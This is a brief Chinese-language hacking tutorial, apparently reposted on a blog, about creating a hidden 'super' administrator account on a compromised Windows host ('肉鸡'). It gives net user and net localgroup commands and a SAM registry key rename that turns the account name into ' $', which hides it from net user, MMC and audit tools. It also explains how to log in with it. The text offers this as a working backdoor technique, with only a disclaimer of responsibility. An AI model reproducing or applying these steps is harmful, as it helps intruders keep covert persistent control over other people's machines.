FreeXploiT:ALLyeSNO
能够实现在 mmc 界面 net user 里面隐形
用工具检查的时候 检查到的第一次建立使用的用户名 查不到隐藏的用户名
有极大的危险性 用此方法改造注册表 造成的危害 本人概不负责
假设肉鸡上已经存在
administrator tesinternetuser
将tesinternetuser 改名为temp
net user tesinternetuser allyesno /add
net localgroup administrator tesinternetuser /add
修改注册表键值
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/tesinternetuser
改为
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/ $
将temp 改回原来名称 tesinternetuser
net user 只会显示 administrator tsinternetuser
mmc不会显示隐藏帐号
用工具检查只会检查出tsinternetuser 存在
登录的时候 用 " $" 登录(注:是空格$)
不完美的地方 用mmc枚举的时候会报告显示 找不到帐号
并且测试过程中发现使用这个帐号的时候 有一些应用程序会报错 例如天网
打造不完美的超级帐号(ALLyeSNO)
最新推荐文章于 2019-02-16 12:47:42 发布